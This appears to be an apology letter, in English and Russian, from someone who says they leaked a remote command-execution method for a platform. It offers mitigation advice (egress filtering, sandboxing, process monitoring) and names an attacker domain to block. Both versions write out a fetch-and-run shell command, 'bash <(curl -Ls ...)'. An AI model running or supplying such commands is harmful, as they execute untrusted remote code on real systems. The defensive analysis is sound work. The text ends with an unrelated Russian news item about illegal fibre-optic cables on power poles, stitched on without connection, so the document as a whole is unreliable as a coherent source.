I am writing to take full responsibility for the recent wave of service abuse that has impacted your platform. I am the person who initiated this situation.
Initially, I discovered a method that allowed for arbitrary command execution using Python on your servers. Without considering the potential consequences, I shared this finding within an online community. I severely underestimated the impact this would have, and I never intended for it to lead to widespread malicious activity.
To mitigate any further damage, I have now deleted all the content I posted regarding this method. I want to express my deepest and most sincere apologies for the significant disruption and trouble this has caused.
In an effort to help you secure your platform and make amends, I am providing a detailed analysis of the exploit and a set of actionable recommendations to block this and similar attacks in the future.
Technical Analysis and Recommendations
The attack relies on the ability to download and execute a remote shell script from within a user’s process. The core command being used is: bash <(curl -Ls [REMOTE_SCRIPT_URL]).
Here are several layered defense strategies to prevent this:
Immediate Mitigation: Network Egress Filtering
This is the fastest way to stop the current attack.
Action:
Block Specific Domain: Use your firewall to block all outbound traffic to the domain main.ssss.nyc.mn.
Default Deny Policy (Best Practice): Block all outbound internet access by default and only whitelist essential domains. This prevents attackers from simply moving their script to a new domain.
Core Solution: Restrict the Execution Environment
This is the fundamental, long-term solution.
Action:
Disable Dangerous Functions: In your Python environment, disable dangerous modules like subprocess, os.system, os.popen, etc.
Use Secure Sandboxing: Run user code within a heavily restricted sandbox (e.g., Docker with strict seccomp and AppArmor/SELinux profiles, or technologies like gVisor). The process should run as a low-privilege, non-root user.
Detection and Monitoring
This allows you to detect and respond to threats in real-time.
Action:
Monitor Process Creation: Log and alert whenever a user’s process spawns a shell or network utility (e.g., /bin/bash, curl, wget).
Monitor Network Connections: Log all outbound connections and alert on traffic to suspicious or unknown destinations.
Summary of Recommendations
Strategy: 1. Network Filtering
Implementation Method: Firewall rules to block specific outbound domains/IPs.
Impact: Immediate. Stops the current attack vector.
Strategy: 2. Environment Hardening
Implementation Method: Disable dangerous functions, use sandboxing (Docker, gVisor).
Impact: Strategic. The most robust long-term solution.
Strategy: 3. Detection & Monitoring
Implementation Method: Log and alert on suspicious process/network activity.
Impact: Proactive. Provides visibility for rapid response.
I once again apologize for my irresponsible actions. I hope this technical information is useful for your team and helps you strengthen your platform’s security.
Sincerely,
Я пишу, чтобы взять на себя полную ответственность за недавнюю волну злоупотреблений сервисами, которая затронула вашу платформу. Я являюсь лицом, инициировавшим эту ситуацию.
Изначально я обнаружил метод, позволяющий выполнять произвольные команды с использованием Python на ваших серверах. Не оценивая возможные последствия, я поделился этим открытием в онлайн-сообществе. Я сильно недооценил последствия этого и никогда не подразумевал, что это приведет к широкому распространению вредоносной активности.
Чтобы минимизировать дальнейший ущерб, я удалил весь опубликованный мной контент, касающийся этого метода. Хочу принести свои глубочайшие и самые искренние извинения за значительные сбои и проблемы, которые это вызвало.
Чтобы помочь вам защитить вашу платформу и исправить ситуацию, я предоставляю подробный анализ эксплойта и набор практических рекомендаций по блокированию этой и подобных атак в будущем.
Технический анализ и рекомендации
Атака основана на возможности загрузки и выполнения удаленного скрипта оболочки из процесса пользователя. Основная используемая команда: bash <(curl -Ls [URL_УДАЛЁННОГО_СКРИПТ]).
Вот несколько многоуровневых стратегий защиты для предотвращения этого:
Немедленное смягчение: Фильтрация исходящего сетевого трафика
Это самый быстрый способ остановить текущую атаку.
Действие:
Блокировка определённого домена: Используйте брандмауэр для блокировки всего исходящего трафика в домен main.ssss.nyc.mn.
Политика запрета по умолчанию (рекомендуемая практика): Блокируйте весь исходящий интернет-доступ по умолчанию и добавляйте в белый список только необходимые домены. Это не позволит злоумышленникам просто перенести свой скрипт в новый домен.
Основное решение: Ограничьте среду выполнения
Это фундаментальное долгосрочное решение.
Действие:
Отключите опасные функции: В вашей среде Python отключите опасные модули, такие как subprocess, os.system, os.popen и т. д.
Используйте безопасную песочницу: запускайте пользовательский код в строго ограниченной песочнице (например, Docker со строгими профилями seccomp и AppArmor/SELinux, или такими технологиями, как gVisor). Процесс должен запускаться от имени пользователя с низкими привилегиями, не являющегося пользователем root.
Обнаружение и мониторинг
Это позволяет обнаруживать угрозы и реагировать на них в режиме реального времени.
Действие:
Мониторинг создания процессов: регистрируйте и оповещайте о каждом запуске пользовательским процессом оболочки или сетевой утилиты (например, /bin/bash, curl, wget).
Мониторинг сетевых подключений: регистрируйте все исходящие соединения и оповещайте о трафике, направленном на подозрительные или неизвестные адреса.
Резюме рекомендаций
Стратегия: 1. Фильтрация сети
Метод реализации: правила брандмауэра для блокировки определенных исходящих доменов/IP-адресов.
Воздействие: немедленное. Блокирует текущий вектор атаки.
Стратегия: 2. Укрепление среды
Метод реализации: Отключение опасных функций, использование изолированной среды (Docker, gVisor).
Воздействие: Стратегическое. Наиболее надёжное долгосрочное решение.
Стратегия: 3. Обнаружение и мониторинг
Метод реализации: Регистрация и оповещение о подозрительной активности процесса/сети.
Воздействие: Проактивное. Обеспечивает прозрачность для быстрого реагирования.
Ещё раз прошу прощения за свои безответственные действия. Надеюсь, эта техническая информация будет полезна вашей команде и поможет вам укрепить безопасность вашей платформы.
С уважением,
С начала 2025 года «Россети Московский регион» выявили 145 663 нелегальных проводов волоконно‑оптических линий связи (ВОЛС), размещённых на опорах линий электропередачи компании. По словам «Россетей», захламлённость опорных сооружений незаконными проводами мешает проведению плановых и восстановительных работ, а также создаёт угрозу стабильной работе электросетевого оборудования.
